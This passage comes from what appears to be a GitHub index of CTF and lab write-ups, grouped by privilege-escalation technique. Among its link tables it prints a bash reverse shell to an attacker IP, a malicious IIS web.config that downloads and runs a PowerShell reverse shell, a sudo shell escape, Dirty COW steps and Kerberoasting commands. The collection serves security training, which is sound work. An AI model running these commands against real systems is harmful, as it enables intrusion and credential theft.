[`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc"></a> ### ⚙️ PrivEsc [🡑](#ttps) <a name="privesc_anansi"></a> #### privesc_anansi [⇡](#privesc) the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell ```shell sudo /home/anansi/bin/anansi_util manual cat /etc/shadow - (press RETURN) !/bin/bash ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_bash_reverseshell"></a> #### privesc_bash_reverseshell [⇡](#privesc) bash reverse shell command ```shell bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="privesc_bof"></a> #### privesc_bof [⇡](#privesc) craft exploit for the buffer overflow vulnerability to gain elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | --- <a name="privesc_chkrootkit"></a> #### privesc_chkrootkit [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | --- <a name="privesc_credsreuse"></a> #### privesc_credsreuse [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="privesc_cron"></a> #### privesc_cron [⇡](#privesc) leverage cronjobs to modify and execute `root` owned files ```shell crontab -l cat /etc/crontab ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_cron_rootjobs"></a> #### privesc_cron_rootjobs [⇡](#privesc) it would be useful to find `root` owned cronjob processes ```shell pspy # find root owned processes, cronjobs find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root ./CheckcronJob.sh # find background processes ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | [+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/ --- <a name="privesc_ctf_usertxt_timestamp"></a> #### privesc_ctf_usertxt_timestamp [⇡](#privesc) a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files ```shell ls -lh /home/<username>/user.txt ``` [+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19 --- <a name="privesc_dirtycow"></a> #### privesc_dirtycow [⇡](#privesc) race condition that allows breakage of private read-only memory mappings ```shell wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c gcc -pthread -o dc dc.c -lcrypt ./dc ``` [+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs --- <a name="privesc_docker_group"></a> #### privesc_docker_group [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_env_relative_path"></a> #### privesc_env_relative_path [⇡](#privesc) certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="privesc_freebsd"></a> #### privesc_freebsd [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | --- <a name="privesc_iis_webconfig"></a> #### privesc_iis_webconfig [⇡](#privesc) on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file ```shell sample web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')") %> ``` [+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html --- <a name="privesc_kerberos_kerberosting"></a> #### privesc_kerberos_kerberosting [⇡](#privesc) allows us to extract administrator tickets and crack those to obtain administrator password ```shell # add entry for target system within /etc/hosts GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding psexec.py [email protected] ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://room362.com/post/2016/kerberoast-pt1/ [+] https://room362.com/post/2016/kerberoast-pt2/ [+] https://room362.com/post/2016/kerberoast-pt3/ --- <a name="privesc_kernel_ipappend"></a> #### privesc_kernel_ipappend [⇡](#privesc) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86) ```shell gcc -m32 -o exploit 9542.c -Wl,--hash-style=both ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | [+] https://www.exploit-db.com/exploits/9542 [+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698 --- <a name="privesc_kernel_overlayfs"></a> #### privesc_kernel_overlayfs [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_lxc_bash"></a> #### privesc_lxc_bash [⇡](#privesc) ```shell check output of id command if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="privesc_modssl"></a> #### privesc_modssl [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | --- <a name="privesc_mysql_creds"></a> #### privesc_mysql_creds [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_mysql_root"></a> #### privesc_mysql_root [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_mysql_udf"></a> #### privesc_mysql_udf [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_nfs_norootsquash"></a> #### privesc_nfs_norootsquash [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_nmap"></a> #### privesc_nmap [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_passwd_writable"></a> #### privesc_passwd_writable [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="privesc_psexec_login"></a> #### privesc_psexec_login [⇡](#privesc) If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system. ```shell psexec <username>@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="privesc_setuid"></a> #### privesc_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), 